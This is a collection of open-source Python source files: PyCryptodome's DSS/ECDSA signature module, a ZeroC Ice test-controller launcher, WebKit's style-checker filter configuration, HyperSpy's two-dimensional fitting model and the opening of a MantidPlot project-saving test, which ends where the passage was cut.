# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ===================================================================
"""
Digital Signature Standard (DSS), as specified in `FIPS PUB 186-3`__.
A sender signs a message in the following way:
>>> from Cryptodome.Hash import SHA256
>>> from Cryptodome.PublicKey import ECC
>>> from Cryptodome.Signature import DSS
>>>
>>> message = b'I give my permission to order #4355'
>>> key = ECC.import_key(open('privkey.der').read())
>>> h = SHA256.new(message)
>>> signer = DSS.new(key, 'fips-186-3')
>>> signature = signer.sign(h)
The receiver can verify authenticity of the message:
>>> key = ECC.import_key(open('pubkey.der').read())
>>> h = SHA256.new(received_message)
>>> verifier = DSS.new(key, 'fips-186-3')
>>> try:
>>>     verifier.verify(h, signature)
>>>     print("The message is authentic.")
>>> except ValueError:
>>>     print("The message is not authentic.")
.. __: http://csrc.nist.gov/publications/fips/fips186-3/fips_186-3.pdf
"""
__all__ = ['new', 'DssSigScheme']
from Cryptodome.Util.py3compat import bchr, b
from Cryptodome.Util.asn1 import DerSequence
from Cryptodome.Util.number import long_to_bytes
from Cryptodome.Math.Numbers import Integer
from Cryptodome.Hash import HMAC
from Cryptodome.PublicKey.ECC import _curve, EccKey
class DssSigScheme(object):
"""This signature scheme can perform DSS signature or verification.
:undocumented: __init__
"""
def __init__(self, key, encoding, order):
"""Create a new Digital Signature Standard (DSS) object.
Do not instantiate this object directly,
use `Cryptodome.Signature.DSS.new` instead.
"""
self._key = key
self._encoding = encoding
self._order = order
self._order_bits = self._order.size_in_bits()
self._order_bytes = (self._order_bits - 1) // 8 + 1
def can_sign(self):
"""Return True if this signature object can be used
for signing messages."""
return self._key.has_private()
def _compute_nonce(self, msg_hash):
raise NotImplementedError("To be provided by subclasses")
def _valid_hash(self, msg_hash):
raise NotImplementedError("To be provided by subclasses")
def sign(self, msg_hash):
"""Produce the DSS signature of a message.
:Parameters:
msg_hash : hash object
The hash that was carried out over the message.
The object belongs to the `Cryptodome.Hash` package.
Under mode *'fips-186-3'*, the hash must be a FIPS
approved secure hash (SHA-1 or a member of the SHA-2 family),
of cryptographic strength appropriate for the DSA key.
For instance, a 3072/256 DSA key can only be used
in combination with SHA-512.
:Return: The signature encoded as a byte string.
:Raise ValueError:
If the hash algorithm is incompatible to the DSA key.
:Raise TypeError:
If the DSA key has no private half.
"""
if not self._valid_hash(msg_hash):
raise ValueError("Hash is not sufficiently strong")
# Generate the nonce k (critical!)
nonce = self._compute_nonce(msg_hash)
# Perform signature using the raw API
z = Integer.from_bytes(msg_hash.digest()[:self._order_bytes])
sig_pair = self._key._sign(z, nonce)
# Encode the signature into a single byte string
if self._encoding == 'binary':
output = b("").join([long_to_bytes(x, self._order_bytes)
for x in sig_pair])
else:
            # Dss-sig  ::=  SEQUENCE  {
            #       r       INTEGER,
            #       s       INTEGER
            # }
output = DerSequence(sig_pair).encode()
return output
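    # Size sketch (illustrative, assuming a 256-bit order): 'binary'
    # signatures are always exactly 64 bytes (r and s, 32 bytes each,
    # zero-padded), while 'der' signatures are a variable-length SEQUENCE
    # of two INTEGERs, typically 70-72 bytes.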
def verify(self, msg_hash, signature):
"""Verify that a certain DSS signature is authentic.
This function checks if the party holding the private half of the key
really signed the message.
:Parameters:
msg_hash : hash object
The hash that was carried out over the message.
This is an object belonging to the `Cryptodome.Hash` module.
Under mode *'fips-186-3'*, the hash must be a FIPS
approved secure hash (SHA-1 or a member of the SHA-2 family),
of cryptographic strength appropriate for the DSA key.
For instance, a 3072/256 DSA key can only be used in
combination with SHA-512.
signature : byte string
The signature that needs to be validated.
:Raise ValueError:
If the signature is not authentic.
"""
if not self._valid_hash(msg_hash):
raise ValueError("Hash does not belong to SHS")
if self._encoding == 'binary':
if len(signature) != (2 * self._order_bytes):
raise ValueError("The signature is not authentic (length)")
r_prime, s_prime = [Integer.from_bytes(x)
for x in (signature[:self._order_bytes],
signature[self._order_bytes:])]
else:
try:
der_seq = DerSequence().decode(signature)
except (ValueError, IndexError):
raise ValueError("The signature is not authentic (DER)")
if len(der_seq) != 2 or not der_seq.hasOnlyInts():
raise ValueError("The signature is not authentic (DER content)")
r_prime, s_prime = der_seq[0], der_seq[1]
if not (0 < r_prime < self._order) or not (0 < s_prime < self._order):
raise ValueError("The signature is not authentic (d)")
z = Integer.from_bytes(msg_hash.digest()[:self._order_bytes])
result = self._key._verify(z, (r_prime, s_prime))
if not result:
raise ValueError("The signature is not authentic")
        # Make legacy PyCrypto-style code fail: PyCryptodome reports a bad
        # signature by raising ValueError, so code that still tests the old
        # boolean return value never sees a truthy result.
        return False
class DeterministicDsaSigScheme(DssSigScheme):
# Also applicable to ECDSA
def __init__(self, key, encoding, order, private_key):
super(DeterministicDsaSigScheme, self).__init__(key, encoding, order)
self._private_key = private_key
def _bits2int(self, bstr):
"""See 2.3.2 in RFC6979"""
result = Integer.from_bytes(bstr)
q_len = self._order.size_in_bits()
b_len = len(bstr) * 8
if b_len > q_len:
result >>= (b_len - q_len)
return result
def _int2octets(self, int_mod_q):
"""See 2.3.3 in RFC6979"""
assert 0 < int_mod_q < self._order
return long_to_bytes(int_mod_q, self._order_bytes)
def _bits2octets(self, bstr):
"""See 2.3.4 in RFC6979"""
z1 = self._bits2int(bstr)
if z1 < self._order:
z2 = z1
else:
z2 = z1 - self._order
return self._int2octets(z2)
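    # Worked example (illustrative) of the conversions above, using a toy
    # 8-bit order q = 0xA5:
    #   _bits2int(b'\xff\xff')    -> 0xFFFF >> (16 - 8) = 0xFF
    #   _bits2octets(b'\xff\xff') -> 0xFF >= q, so 0xFF - 0xA5 = 0x5A -> b'\x5a'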
def _compute_nonce(self, mhash):
"""Generate k in a deterministic way"""
# See section 3.2 in RFC6979.txt
# Step a
h1 = mhash.digest()
# Step b
mask_v = bchr(1) * mhash.digest_size
# Step c
nonce_k = bchr(0) * mhash.digest_size
for int_oct in 0, 1:
# Step d/f
nonce_k = HMAC.new(nonce_k,
mask_v + bchr(int_oct) +
self._int2octets(self._private_key) +
self._bits2octets(h1), mhash).digest()
# Step e/g
mask_v = HMAC.new(nonce_k, mask_v, mhash).digest()
nonce = -1
while not (0 < nonce < self._order):
# Step h.C (second part)
if nonce != -1:
nonce_k = HMAC.new(nonce_k, mask_v + bchr(0),
mhash).digest()
mask_v = HMAC.new(nonce_k, mask_v, mhash).digest()
# Step h.A
mask_t = b("")
# Step h.B
while len(mask_t) < self._order_bytes:
mask_v = HMAC.new(nonce_k, mask_v, mhash).digest()
mask_t += mask_v
# Step h.C (first part)
nonce = self._bits2int(mask_t)
return nonce
def _valid_hash(self, msg_hash):
return True
class FipsDsaSigScheme(DssSigScheme):
#: List of L (bit length of p) and N (bit length of q) combinations
#: that are allowed by FIPS 186-3. The security level is provided in
    #: Table 2 of NIST SP 800-57 (Rev. 3).
_fips_186_3_L_N = (
(1024, 160), # 80 bits (SHA-1 or stronger)
(2048, 224), # 112 bits (SHA-224 or stronger)
(2048, 256), # 128 bits (SHA-256 or stronger)
        (3072, 256)   # 128 bits (SHA-256 or stronger)
)
def __init__(self, key, encoding, order, randfunc):
super(FipsDsaSigScheme, self).__init__(key, encoding, order)
self._randfunc = randfunc
L = Integer(key.p).size_in_bits()
if (L, self._order_bits) not in self._fips_186_3_L_N:
error = ("L/N (%d, %d) is not compliant to FIPS 186-3"
% (L, self._order_bits))
raise ValueError(error)
def _compute_nonce(self, msg_hash):
# hash is not used
return Integer.random_range(min_inclusive=1,
max_exclusive=self._order,
randfunc=self._randfunc)
def _valid_hash(self, msg_hash):
"""Verify that SHA-1, SHA-2 or SHA-3 are used"""
return (msg_hash.oid == "1.3.14.3.2.26" or
msg_hash.oid.startswith("2.16.840.1.101.3.4.2."))
class FipsEcDsaSigScheme(DssSigScheme):
def __init__(self, key, encoding, order, randfunc):
super(FipsEcDsaSigScheme, self).__init__(key, encoding, order)
self._randfunc = randfunc
def _compute_nonce(self, msg_hash):
return Integer.random_range(min_inclusive=1,
max_exclusive=_curve.order,
randfunc=self._randfunc)
def _valid_hash(self, msg_hash):
"""Verify that SHA-[23] (256|384|512) bits are used to
match the 128-bit security of P-256"""
approved = ("2.16.840.1.101.3.4.2.1",
"2.16.840.1.101.3.4.2.2",
"2.16.840.1.101.3.4.2.3",
"2.16.840.1.101.3.4.2.8",
"2.16.840.1.101.3.4.2.9",
"2.16.840.1.101.3.4.2.10")
return msg_hash.oid in approved
def new(key, mode, encoding='binary', randfunc=None):
"""Return a signature scheme object `DSS_SigScheme` that
can be used to perform DSS signature or verification.
:Parameters:
key : a `Cryptodome.PublicKey.DSA` or `Cryptodome.PublicKey.ECC` key object
If the key has got its private half, both signature and
verification are possible.
If it only has the public half, verification is possible
but not signature generation.
For DSA keys, let *L* and *N* be the bit lengths of the modules *p*
and *q*: the combination *(L,N)* must appear in the following list,
in compliance to section 4.2 of `FIPS-186`__:
- (1024, 160)
- (2048, 224)
- (2048, 256)
- (3072, 256)
mode : string
The parameter can take these values:
- *'fips-186-3'*. The signature generation is carried out
according to `FIPS-186`__: the nonce *k* is taken from the RNG.
- *'deterministic-rfc6979'*. The signature generation
process does not rely on a random generator.
See RFC6979_.
encoding : string
How the signature is encoded. This value determines the output of
``sign`` and the input of ``verify``.
The following values are accepted:
- *'binary'* (default), the signature is the raw concatenation
of *r* and *s*. The size in bytes of the signature is always
two times the size of *q*.
- *'der'*, the signature is a DER encoded SEQUENCE with two
INTEGERs, *r* and *s*. The size of the signature is variable.
randfunc : callable
The source of randomness. If ``None``, the internal RNG is used.
Only used for the *'fips-186-3'* mode.
.. __: http://csrc.nist.gov/publications/fips/fips186-3/fips_186-3.pdf
.. __: http://csrc.nist.gov/publications/fips/fips186-3/fips_186-3.pdf
.. _RFC6979: http://tools.ietf.org/html/rfc6979
"""
    # The goal of the 'mode' parameter is to avoid having
    # the current version of the standard as the default.
#
# Over time, such version will be superseded by (for instance)
# FIPS 186-4 and it will be odd to have -3 as default.
if encoding not in ('binary', 'der'):
raise ValueError("Unknown encoding '%s'" % encoding)
if isinstance(key, EccKey):
order = _curve.order
private_key_attr = 'd'
else:
order = Integer(key.q)
private_key_attr = 'x'
if key.has_private():
private_key = getattr(key, private_key_attr)
else:
private_key = None
if mode == 'deterministic-rfc6979':
return DeterministicDsaSigScheme(key, encoding, order, private_key)
elif mode == 'fips-186-3':
if isinstance(key, EccKey):
return FipsEcDsaSigScheme(key, encoding, order, randfunc)
else:
return FipsDsaSigScheme(key, encoding, order, randfunc)
else:
raise ValueError("Unknown DSS mode '%s'" % mode)
| Haynie-Research-and-Development/jarvis | deps/lib/python3.4/site-packages/Cryptodome/Signature/DSS.py | Python | gpl-2.0 | 15,276 |
#!/usr/bin/env python
# **********************************************************************
#
# Copyright (c) 2003-2015 ZeroC, Inc. All rights reserved.
#
# This copy of Ice is licensed to you under the terms described in the
# ICE_LICENSE file included in this distribution.
#
# **********************************************************************
import os, sys, threading, subprocess, getopt, signal
path = [ ".", "..", "../..", "../../..", "../../../.." ]
head = os.path.dirname(sys.argv[0])
if len(head) > 0:
path = [os.path.join(head, p) for p in path]
path = [os.path.abspath(p) for p in path if os.path.exists(os.path.join(p, "scripts", "TestUtil.py")) ]
if len(path) == 0:
raise RuntimeError("can't find toplevel directory!")
sys.path.append(os.path.join(path[0], "scripts"))
import TestUtil
def removeTrustSettings():
serverCert = os.path.join(path[0], "certs", "server.pem")
if os.system("security verify-cert -c " + serverCert + " >& /dev/null") == 0:
sys.stdout.write("removing trust settings for the HTTP server certificate... ")
sys.stdout.flush()
if os.system("security remove-trusted-cert " + serverCert) != 0:
print("\nerror: couldn't remove trust settings for the HTTP server certificate")
else:
print("ok")
else:
print("trust settings already removed")
#
# On OS X, provide an option to allow removing the trust settings
#
if TestUtil.isDarwin():
try:
opts, args = getopt.getopt(sys.argv[1:], "", ["clean"])
if ("--clean", "") in opts:
removeTrustSettings()
sys.exit(0)
except getopt.GetoptError:
pass
version = "3.6.0"
jar = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..",
"java/test/controller/build/libs/testController-%(version)s.jar" % {"version": version})
javaHome = os.environ.get("JAVA_HOME", "")
javaCmd = '%s' % os.path.join(javaHome, "bin", "java") if javaHome else "java"
command = [javaCmd, "-jar", jar]
if len(sys.argv) > 1:
command += sys.argv[1:]
p = subprocess.Popen(command, shell = False, stdin = subprocess.PIPE, stdout = subprocess.PIPE,
stderr = subprocess.STDOUT, bufsize = 0)
def signal_handler(signal, frame):
if p:
p.terminate()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
if TestUtil.isDarwin():
#
    # On OS X, we set the trust settings on the certificate to prevent
    # the Web browsers from prompting the user about the untrusted
    # certificate. Some browsers such as Chrome don't provide the
    # option to set these trust settings.
#
serverCert = os.path.join(TestUtil.toplevel, "certs", "server.pem")
if os.system("security verify-cert -c " + serverCert + " >& /dev/null") != 0:
sys.stdout.write("adding trust settings for the HTTP server certificate... ")
sys.stdout.flush()
if os.system("security add-trusted-cert -r trustAsRoot " + serverCert) != 0:
print("error: couldn't add trust settings for the HTTP server certificate")
print("ok")
print("run " + sys.argv[0] + " --clean to remove the trust setting")
while(True):
c = p.stdout.read(1)
if not c: break
if c == '\r': continue
# Depending on Python version and platform, the value c could be a
# string or a bytes object.
if type(c) != str:
c = c.decode()
sys.stdout.write(c)
sys.stdout.flush()
| elijah513/ice | scripts/TestController.py | Python | gpl-2.0 | 3,512 |
# Copyright (C) 2010 Chris Jerdonek ([email protected])
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains filter-related code."""
def validate_filter_rules(filter_rules, all_categories):
"""Validate the given filter rules, and raise a ValueError if not valid.
Args:
filter_rules: A list of boolean filter rules, for example--
["-whitespace", "+whitespace/braces"]
all_categories: A list of all available category names, for example--
["whitespace/tabs", "whitespace/braces"]
Raises:
ValueError: An error occurs if a filter rule does not begin
with "+" or "-" or if a filter rule does not match
the beginning of some category name in the list
of all available categories.
"""
for rule in filter_rules:
if not (rule.startswith('+') or rule.startswith('-')):
raise ValueError('Invalid filter rule "%s": every rule '
"must start with + or -." % rule)
for category in all_categories:
if category.startswith(rule[1:]):
break
else:
raise ValueError('Suspected incorrect filter rule "%s": '
"the rule does not match the beginning "
"of any category name." % rule)
class _CategoryFilter(object):
"""Filters whether to check style categories."""
def __init__(self, filter_rules=None):
"""Create a category filter.
Args:
filter_rules: A list of strings that are filter rules, which
are strings beginning with the plus or minus
symbol (+/-). The list should include any
default filter rules at the beginning.
Defaults to the empty list.
Raises:
ValueError: Invalid filter rule if a rule does not start with
plus ("+") or minus ("-").
"""
if filter_rules is None:
filter_rules = []
self._filter_rules = filter_rules
self._should_check_category = {} # Cached dictionary of category to True/False
def __str__(self):
return ",".join(self._filter_rules)
# Useful for unit testing.
def __eq__(self, other):
"""Return whether this CategoryFilter instance is equal to another."""
return self._filter_rules == other._filter_rules
# Useful for unit testing.
def __ne__(self, other):
        # Python does not automatically deduce this from __eq__().
return not (self == other)
def should_check(self, category):
"""Return whether the category should be checked.
The rules for determining whether a category should be checked
are as follows. By default all categories should be checked.
Then apply the filter rules in order from first to last, with
later flags taking precedence.
A filter rule applies to a category if the string after the
leading plus/minus (+/-) matches the beginning of the category
name. A plus (+) means the category should be checked, while a
minus (-) means the category should not be checked.
"""
if category in self._should_check_category:
return self._should_check_category[category]
should_check = True # All categories checked by default.
for rule in self._filter_rules:
if not category.startswith(rule[1:]):
continue
should_check = rule.startswith('+')
self._should_check_category[category] = should_check # Update cache.
return should_check
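# Illustrative sketch (not part of the original module) of how filter rules
# combine, with later rules taking precedence:
#
#     f = _CategoryFilter(["-whitespace", "+whitespace/braces"])
#     f.should_check("whitespace/tabs")    # False: matches "-whitespace"
#     f.should_check("whitespace/braces")  # True: the later "+" rule wins
#     f.should_check("build/include")      # True: checked by default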
class FilterConfiguration(object):
"""Supports filtering with path-specific and user-specified rules."""
def __init__(self, base_rules=None, path_specific=None, user_rules=None):
"""Create a FilterConfiguration instance.
Args:
base_rules: The starting list of filter rules to use for
processing. The default is the empty list, which
by itself would mean that all categories should be
checked.
path_specific: A list of (sub_paths, path_rules) pairs
that stores the path-specific filter rules for
appending to the base rules.
The "sub_paths" value is a list of path
substrings. If a file path contains one of the
substrings, then the corresponding path rules
are appended. The first substring match takes
precedence, i.e. only the first match triggers
an append.
The "path_rules" value is the tuple of filter
rules that can be appended to the base rules.
The value is a tuple rather than a list so it
can be used as a dictionary key. The dictionary
is for caching purposes in the implementation of
this class.
user_rules: A list of filter rules that is always appended
to the base rules and any path rules. In other
                        words, the user rules take precedence over
                        everything. In practice, the user rules are
provided by the user from the command line.
"""
if base_rules is None:
base_rules = []
if path_specific is None:
path_specific = []
if user_rules is None:
user_rules = []
self._base_rules = base_rules
self._path_specific = path_specific
self._path_specific_lower = None
"""The backing store for self._get_path_specific_lower()."""
# FIXME: Make user rules internal after the FilterConfiguration
# attribute is removed from ProcessorOptions (since at
# that point ArgumentPrinter will no longer need to
# access FilterConfiguration.user_rules).
self.user_rules = user_rules
self._path_rules_to_filter = {}
"""Cached dictionary of path rules to CategoryFilter instance."""
# The same CategoryFilter instance can be shared across
# multiple keys in this dictionary. This allows us to take
# greater advantage of the caching done by
# CategoryFilter.should_check().
self._path_to_filter = {}
"""Cached dictionary of file path to CategoryFilter instance."""
# Useful for unit testing.
def __eq__(self, other):
"""Return whether this FilterConfiguration is equal to another."""
if self._base_rules != other._base_rules:
return False
if self._path_specific != other._path_specific:
return False
if self.user_rules != other.user_rules:
return False
return True
# Useful for unit testing.
def __ne__(self, other):
# Python does not automatically deduce this from __eq__().
return not self.__eq__(other)
# We use the prefix "_get" since the name "_path_specific_lower"
# is already taken up by the data attribute backing store.
def _get_path_specific_lower(self):
"""Return a copy of self._path_specific with the paths lower-cased."""
if self._path_specific_lower is None:
self._path_specific_lower = []
for (sub_paths, path_rules) in self._path_specific:
sub_paths = map(str.lower, sub_paths)
self._path_specific_lower.append((sub_paths, path_rules))
return self._path_specific_lower
def _path_rules_from_path(self, path):
"""Determine the path-specific rules to use, and return as a tuple."""
path = path.lower()
for (sub_paths, path_rules) in self._get_path_specific_lower():
for sub_path in sub_paths:
if path.find(sub_path) > -1:
return path_rules
return () # Default to the empty tuple.
def _filter_from_path_rules(self, path_rules):
"""Return the CategoryFilter associated to a path rules tuple."""
# We reuse the same CategoryFilter where possible to take
# advantage of the caching they do.
if path_rules not in self._path_rules_to_filter:
rules = list(self._base_rules) # Make a copy
rules.extend(path_rules)
rules.extend(self.user_rules)
self._path_rules_to_filter[path_rules] = _CategoryFilter(rules)
return self._path_rules_to_filter[path_rules]
def _filter_from_path(self, path):
"""Return the CategoryFilter associated to a path."""
if path not in self._path_to_filter:
path_rules = self._path_rules_from_path(path)
filter = self._filter_from_path_rules(path_rules)
self._path_to_filter[path] = filter
return self._path_to_filter[path]
def should_check(self, category, path):
"""Return whether the given category should be checked.
This method determines whether a category should be checked
by checking the category name against the filter rules for
the given path.
For a given path, the filter rules are the combination of
the base rules, the path-specific rules, and the user-provided
rules -- in that order. As we will describe below, later rules
in the list take precedence. The path-specific rules are the
rules corresponding to the first element of the "path_specific"
parameter that contains a string case-insensitively matching
some substring of the path. If there is no such element,
there are no path-specific rules for that path.
Given a list of filter rules, the logic for determining whether
a category should be checked is as follows. By default all
categories should be checked. Then apply the filter rules in
order from first to last, with later flags taking precedence.
A filter rule applies to a category if the string after the
leading plus/minus (+/-) matches the beginning of the category
name. A plus (+) means the category should be checked, while a
minus (-) means the category should not be checked.
Args:
category: The category name.
path: The path of the file being checked.
"""
return self._filter_from_path(path).should_check(category)
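# Illustrative sketch (not part of the original module): for a given path the
# effective rules are the base rules, then the path-specific rules, then the
# user rules, so the user rules always win:
#
#     config = FilterConfiguration(
#         base_rules=["-whitespace"],
#         path_specific=[(["webkit/"], ("+whitespace/braces",))],
#         user_rules=["-whitespace/braces"])
#     config.should_check("whitespace/braces", "WebKit/foo.cpp")  # False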
| cattleprod/samsung-kernel-gt-i9100 | external/webkit/WebKitTools/Scripts/webkitpy/style/filter.py | Python | gpl-2.0 | 11,910 |
# -*- coding: utf-8 -*-
# Copyright 2007-2021 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
import numpy as np
from hyperspy._signals.signal2d import Signal2D
from hyperspy.decorators import interactive_range_selector
from hyperspy.exceptions import WrongObjectError
from hyperspy.model import BaseModel, ModelComponents, ModelSpecialSlicers
class Model2D(BaseModel):
"""Model and data fitting for two dimensional signals.
A model is constructed as a linear combination of :mod:`components2D` that
are added to the model using :meth:`append` or :meth:`extend`. There
are many predifined components available in the in the :mod:`components2D`
module. If needed, new components can be created easily using the code of
existing components as a template.
Once defined, the model can be fitted to the data using :meth:`fit` or
:meth:`multifit`. Once the optimizer reaches the convergence criteria or
    the maximum number of iterations, the new values of the component
    parameters are stored in the components.
It is possible to access the components in the model by their name or by
the index in the model. An example is given at the end of this docstring.
Note that methods are not yet defined for plotting 2D models or using
gradient based optimisation methods - these will be added soon.
Attributes
----------
signal : Signal2D instance
It contains the data to fit.
chisq : A Signal of floats
Chi-squared of the signal (or np.nan if not yet fit)
dof : A Signal of integers
Degrees of freedom of the signal (0 if not yet fit)
red_chisq : Signal instance
Reduced chi-squared.
components : `ModelComponents` instance
The components of the model are attributes of this class. This provides
        a convenient way to access the model components when working in IPython
as it enables tab completion.
Methods
-------
append
Append one component to the model.
extend
Append multiple components to the model.
remove
Remove component from model.
fit, multifit
Fit the model to the data at the current position or the full dataset.
See also
--------
Base Model
Model1D
Example
-------
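    A minimal sketch (the data and component choice are illustrative):

    >>> import numpy as np
    >>> import hyperspy.api as hs
    >>> s = hs.signals.Signal2D(np.random.random((32, 32)))
    >>> m = s.create_model()
    >>> m.append(hs.model.components2D.Gaussian2D())
    >>> m.fit()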
"""
def __init__(self, signal2D, dictionary=None):
super(Model2D, self).__init__()
self.signal = signal2D
self.axes_manager = self.signal.axes_manager
self._plot = None
self._position_widgets = {}
self._adjust_position_all = None
self._plot_components = False
self._suspend_update = False
self._model_line = None
self.xaxis, self.yaxis = np.meshgrid(
self.axes_manager.signal_axes[0].axis,
self.axes_manager.signal_axes[1].axis)
self.axes_manager.events.indices_changed.connect(
self._on_navigating, [])
self.channel_switches = np.ones(self.xaxis.shape, dtype=bool)
self.chisq = signal2D._get_navigation_signal()
self.chisq.change_dtype("float")
self.chisq.data.fill(np.nan)
self.chisq.metadata.General.title = (
self.signal.metadata.General.title + ' chi-squared')
self.dof = self.chisq._deepcopy_with_new_data(
np.zeros_like(self.chisq.data, dtype='int'))
self.dof.metadata.General.title = (
self.signal.metadata.General.title + ' degrees of freedom')
self.free_parameters_boundaries = None
self.convolved = False
self.components = ModelComponents(self)
if dictionary is not None:
self._load_dictionary(dictionary)
self.inav = ModelSpecialSlicers(self, True)
self.isig = ModelSpecialSlicers(self, False)
self._whitelist = {
'channel_switches': None,
'convolved': None,
'free_parameters_boundaries': None,
'chisq.data': None,
'dof.data': None}
self._slicing_whitelist = {
'channel_switches': 'isig',
'chisq.data': 'inav',
'dof.data': 'inav'}
@property
def signal(self):
return self._signal
@signal.setter
def signal(self, value):
if isinstance(value, Signal2D):
self._signal = value
else:
raise WrongObjectError(str(type(value)), 'Signal2D')
def __call__(self, non_convolved=True, onlyactive=False):
"""Returns the corresponding 2D model for the current coordinates
Parameters
----------
        onlyactive : bool
If true, only the active components will be used to build the
model.
Returns
-------
numpy array
"""
sum_ = np.zeros_like(self.xaxis)
if onlyactive is True:
for component in self: # Cut the parameters list
if component.active:
np.add(sum_, component.function(self.xaxis, self.yaxis),
sum_)
else:
for component in self: # Cut the parameters list
np.add(sum_, component.function(self.xaxis, self.yaxis),
sum_)
return sum_[self.channel_switches]
def _errfunc(self, param, y, weights=None):
if weights is None:
weights = 1.
errfunc = self._model_function(param).ravel() - y
return errfunc * weights
def _set_signal_range_in_pixels(self, i1=None, i2=None):
raise NotImplementedError
@interactive_range_selector
def set_signal_range(self, x1=None, x2=None):
raise NotImplementedError
def _remove_signal_range_in_pixels(self, i1=None, i2=None):
raise NotImplementedError
@interactive_range_selector
def remove_signal_range(self, x1=None, x2=None):
raise NotImplementedError
def reset_signal_range(self):
raise NotImplementedError
def _add_signal_range_in_pixels(self, i1=None, i2=None):
raise NotImplementedError
@interactive_range_selector
def add_signal_range(self, x1=None, x2=None):
raise NotImplementedError
def reset_the_signal_range(self):
raise NotImplementedError
def _check_analytical_jacobian(self):
"""Check all components have analytical gradients.
If they do, return True and an empty string.
If they do not, return False and an error message.
"""
return False, "Analytical gradients not implemented for Model2D"
def _jacobian(self, param, y, weights=None):
raise NotImplementedError
def _function4odr(self, param, x):
raise NotImplementedError
def _jacobian4odr(self, param, x):
raise NotImplementedError
def _poisson_likelihood_function(self, param, y, weights=None):
raise NotImplementedError
def _gradient_ml(self, param, y, weights=None):
raise NotImplementedError
def _gradient_ls(self, param, y, weights=None):
raise NotImplementedError
def _huber_loss_function(self, param, y, weights=None, huber_delta=None):
raise NotImplementedError
def _gradient_huber(self, param, y, weights=None, huber_delta=None):
raise NotImplementedError
def _model2plot(self, axes_manager, out_of_range2nans=True):
old_axes_manager = None
if axes_manager is not self.axes_manager:
old_axes_manager = self.axes_manager
self.axes_manager = axes_manager
self.fetch_stored_values()
s = self.__call__(non_convolved=False, onlyactive=True)
if old_axes_manager is not None:
self.axes_manager = old_axes_manager
self.fetch_stored_values()
if out_of_range2nans is True:
ns = np.empty(self.xaxis.shape)
ns.fill(np.nan)
ns[np.where(self.channel_switches)] = s.ravel()
s = ns
return s
def plot(self, plot_components=False):
raise NotImplementedError
@staticmethod
def _connect_component_line(component):
raise NotImplementedError
@staticmethod
def _disconnect_component_line(component):
raise NotImplementedError
def _plot_component(self, component):
raise NotImplementedError
def enable_adjust_position(
self, components=None, fix_them=True, show_label=True):
raise NotImplementedError
def disable_adjust_position(self):
raise NotImplementedError
| erh3cq/hyperspy | hyperspy/models/model2d.py | Python | gpl-3.0 | 9,161 |
"""
Test of basic project saving and loading
"""
import mantidplottests
from mantidplottests import *
import shutil
import numpy as np
import re
from PyQt4 import QtGui, QtCore
class MantidPlotProjectSerialiseTest(unittest.TestCase):
def setUp(self):
self._project_name = "MantidPlotTestProject"
self._project_folder = os.path.join(os.path.expanduser("~"),
self._project_name)
file_name = "%s.mantid" % self._project_name
self._project_file = os.path.join(self._project_folder, file_name)
def tearDown(self):
# Clean up project files
if os.path.isdir(self._project_folder):
remove_folder(self._project_folder)
clear_mantid()
def test_project_file_with_no_data(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
saveProjectAs(self._project_folder)
self.assertTrue(os.path.isdir(self._project_folder))
self.assertTrue(os.path.isfile(self._project_file))
file_text = "MantidPlot 0.9.5 project file\n" \
"<scripting-lang>\tPython\n" \
"<windows>\t0\n" \
"<mantidworkspaces>\n" \
"WorkspaceNames\tfake_workspace\n" \
"</mantidworkspaces>"
exp_contents = parse_project_file(file_text)
contents = read_project_file(self._project_folder)
self.assertEqual(contents, exp_contents)
def test_project_file_with_plotted_spectrum(self):
workspace_name = "fake_workspace"
create_dummy_workspace(workspace_name)
plotSpectrum(workspace_name, 1)
saveProjectAs(self._project_folder)
self.assert_project_files_saved(workspace_name)
contents = read_project_file(self._project_folder)
        # Check correct number of windows
